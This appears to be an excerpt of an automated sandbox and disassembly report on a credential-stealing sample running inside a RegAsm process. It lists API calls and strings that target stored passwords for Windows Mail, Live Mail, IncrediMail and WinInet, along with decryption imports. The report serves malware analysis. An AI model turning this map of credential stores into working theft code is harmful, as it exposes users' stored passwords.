                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                                                        • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Salt, xrefs: 00443BA7
                                                                                                                                                                                                                      • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpymemset$??2@??3@ByteCharCloseFreeLibraryLoadLocalMultiWidestrlenstrtoul
                                                                                                                                                                                                                      • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                                                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                                                      • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                                                        • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                                                        • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                                                        • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                                                      • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                                                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410171
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                      • API String ID: 912701516-1821301763
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                      • String ID: Creds$ps:password
                                                                                                                                                                                                                      • API String ID: 313032062-1872227768
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040301E
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040306B
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403083
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004030B4
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                                                      • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                                                      • API String ID: 3672803090-3168940695
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 3540791495-3849865405
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                      • API String ID: 1640410171-2022683286
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                      • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 667451143-3916222277
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                      • API String ID: 893589435-260894208
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                      • API String ID: 2881943006-572158859
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                      • API String ID: 534179979-232097475
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                      • API String ID: 888011440-2039793938
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                                                      • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                      • String ID: 0wE$d
                                                                                                                                                                                                                      • API String ID: 2915808112-1552800882
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringstrchr
